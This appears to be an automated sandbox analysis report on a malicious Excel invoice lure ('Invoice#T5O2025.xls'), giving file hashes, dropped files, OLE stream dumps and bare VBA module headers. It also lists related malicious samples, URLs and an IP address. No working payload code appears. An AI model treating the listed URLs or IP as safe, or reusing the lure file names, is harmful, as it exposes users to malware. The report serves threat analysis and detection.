                          GUtEaDsc9X.dllGet hashmaliciousWannacryBrowse
                          • 14.103.79.10
                          DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          https://forrestore.com/static/apps/437.zipGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          https://delicate-twilight-4fcb7a.netlify.app/Get hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          No context
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):118
                          Entropy (8bit):3.5700810731231707
                          Encrypted:false
                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                          MD5:573220372DA4ED487441611079B623CD
                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):970
                          Entropy (8bit):2.7144290103121165
                          Encrypted:false
                          SSDEEP:24:J3fIxk+vpCHhFGMfk6ScvBZGA8xpiOnAvJ5yoIHWJ4Ry:h3+RCHaMfkpcv/GAYcvJ5LIHM4w
                          MD5:33694DF65F2381221A32F7066C2BBF76
                          SHA1:053989F4C9DD243FBF192AE05A38A471B622E4A7
                          SHA-256:2E8FEF2D27B8CD0119223C72221E40AEE1DBD23985C02898733789AA823FB79B
                          SHA-512:7B336729095A56A8B3E865D67E8BA221823C3F0478DD08E5372D2E5C9B481963A638560EECB36777C40ED14FB01398AAA8860587588AF3BDAD9B939270A0274F
                          Malicious:false
                          Reputation:low
                          Preview:1.1.9.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.6.3.7.8.,.3.7.4.6.3.7.6.,.1.7.8.8.6.5.8.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.1.1.1.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.2.4.6.0.9.2.5.8.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.6.3.7.1.6.9.4.,.2.7.1.5.3.4.9.7.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.1.5.6.1.9.5.8.,.5.7.9.9.9.6.6.1.,.5.8.4.2.5.8.6.0.,.2.7.3.6.0.0.9.5.,.6.3.0.6.3.0.9.9.,.6.3.6.4.3.3.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.1.6.5.7.4.5.3.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.2.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.7.7.1.6.5.7.,.1.3.5.2.5.8.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.3.2.0.5.9.2.7.6.7.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.1.1.9.6.2.9.3.,.3.7.4.6.3.7.9.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Cannot read section info
                          Category:dropped
                          Size (bytes):1536
                          Entropy (8bit):1.2629645860827994
                          Encrypted:false
                          SSDEEP:6:rl912N0xs+CFf4lX+lG8ElCl5XCB9Xh9X:rl3lKFAlXanMClJCb7
                          MD5:3230B4FC6220288DC9F912987E307CA6
                          SHA1:4F12D9C7E7A9280E2E19A6C12570C14192245601
                          SHA-256:7E59FCF67E08FC8A5CBF61A24A5152752BD07BAE548DC94357E372EB2A1850D3
                          SHA-512:69CC2B8D462EB25404DED53D021DD0A3A1C975BA37BBE3CD9778514DFD5660F90ADF188D4731FA535B40274421218416B5C921A31AA02736D31B1D032C202DD9
                          Malicious:false
                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):339968
                          Entropy (8bit):7.485472295145417
                          Encrypted:false
                          SSDEEP:6144:Ek3hbdlylKsgwyzcTbWhZFVE+WaxHA8JycxdI2rHJFZpLcriO5nzdbNih7FnOIbb:9JTxdI2z/A+OZzdbNih7FnRMOoBWB
                          MD5:68BF86D7214D2C3562BE4A196F3FE808
                          SHA1:EAAF0C46F427384B836E2B480C1D6A1D673FD817
                          SHA-256:2FF47A8F489C2E850493578663B9339D4D29676CC25EC1509A8575AB49D9A4E2
                          SHA-512:17B53C2AC62E45A21B788C23AA50EAB7132649B287EB85FD8E6988358DAEEB72C75E77205FC2B709543EFC717DF74E0FBB5D2F96B30C465BC8EFDC9CC4E2D46D
                          Malicious:false
                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jan 16 07:26:42 2025, Security: 1
                          Category:dropped
                          Size (bytes):892416
                          Entropy (8bit):7.642277873183285
                          Encrypted:false
                          SSDEEP:24576:gpbl/Az1dbIXRM9kVFu3bVCbARM8qIkU:cbpAMX+qVFu3bVPHk
                          MD5:4D3F5A4E25370C6A8A47A7DD8C8816B6
                          SHA1:2235ADBD25CC6DC155006FE3A5CBC0A4B464CCF7
                          SHA-256:64F1FC3E4BBD0F353E473AE9F6BF4AD7EDE4F53CDED8AF73DBC5A55ABDC57793
                          SHA-512:C553196C20CCE16CC9966A315C72F57B79384972E66096FA3C1E72BD334BA322695E78C8C11F5AB7D46812D3E41CFA39BB987D33B141157BDAEB2A4860A2BB02
                          Malicious:false
                          Preview:......................>...............................................................................C...D...................s...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jan 16 07:26:42 2025, Security: 1
                          Category:dropped
                          Size (bytes):892416
                          Entropy (8bit):7.642277873183285
                          Encrypted:false
                          SSDEEP:24576:gpbl/Az1dbIXRM9kVFu3bVCbARM8qIkU:cbpAMX+qVFu3bVPHk
                          MD5:4D3F5A4E25370C6A8A47A7DD8C8816B6
                          SHA1:2235ADBD25CC6DC155006FE3A5CBC0A4B464CCF7
                          SHA-256:64F1FC3E4BBD0F353E473AE9F6BF4AD7EDE4F53CDED8AF73DBC5A55ABDC57793
                          SHA-512:C553196C20CCE16CC9966A315C72F57B79384972E66096FA3C1E72BD334BA322695E78C8C11F5AB7D46812D3E41CFA39BB987D33B141157BDAEB2A4860A2BB02
                          Malicious:true
                          Preview:......................>...............................................................................C...D...................s...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jan 15 01:51:22 2025, Security: 1
                          Entropy (8bit):7.766933452071543
                          TrID:
                          • Microsoft Excel sheet (30009/1) 47.99%
                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                          File name:Invoice#T5O2025.xls
                          File size:1'275'904 bytes
                          MD5:672c67954a3bfbd5cd55c71d59d5b6cf
                          SHA1:2568553e9931dea57a5d27239b406319a8ca1c6a
                          SHA256:11cef9a224722a7d5726188155d3c6ccd2a206a49ce9121e338a843617856b75
                          SHA512:6788ed9a19da35f7bfb63ca983328b6fc6a3976978b702653f5cdd229b5bb3be541e527c6aaadc0c2321af80b63778821a6e731f4f348add2216a8bd0d7c4b9f
                          SSDEEP:24576:/kefLKcMea3tjAb1ZbcPBsTYiF3bVDbARM839jpnvMGJs/Vo:MefLK553lgkP28iF3bVwfnvMGJw
                          TLSH:B14501C3A68D9F42C92643307AB34B5D1712AD03DA6262BB22F4771E6BF72D04543F5A
                          File Content Preview:........................>.......................................................................................................m.......o.......q.......s......................................................................................................
                          Icon Hash:35ed8e920e8c81b5
                          Document Type:OLE
                          Number of OLE Files:1
                          Has Summary Info:
                          Application Name:Microsoft Excel
                          Encrypted Document:True
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:False
                          Flash Objects Count:0
                          Contains VBA Macros:True
                          Code Page:1252
                          Author:
                          Last Saved By:
                          Create Time:2006-09-16 00:00:00
                          Last Saved Time:2025-01-15 01:51:22
                          Creating Application:Microsoft Excel
                          Security:1
                          Document Code Page:1252
                          Thumbnail Scaling Desired:False
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:786432
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                          VBA File Name:Sheet1.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 78 49 e2 89 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet1"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                          VBA File Name:Sheet2.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x I . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 78 49 89 02 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet2"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                          VBA File Name:Sheet3.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x I } . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 78 49 e1 7d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet3"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                          VBA File Name:ThisWorkbook.cls
                          Stream Size:985
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 78 49 eb d1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "ThisWorkbook"
                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:244
                          Entropy:2.889430592781307
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                          General
                          Stream Path:\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:200
                          Entropy:3.250350317504982
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . K f . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                          General
                          Stream Path:MBD0081AAF9/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:99
                          Entropy:3.631242196770981
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0081AAF9/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:94938
                          Entropy:7.802143573216423
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . M v j . . . 8 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 19 4d 76 6a ba 01 00 00 38 07 00 00 13 00 d9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0081AAFA/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0081AAFA/\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:244
                          Entropy:2.701136490257069
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                          General
                          Stream Path:MBD0081AAFA/\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:220
                          Entropy:3.3813251513223976
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . ^ . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                          General
                          Stream Path:MBD0081AAFA/MBD000673C0/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.219515110876372
                          Base64 Encoded:False
                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0081AAFA/MBD000673C0/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
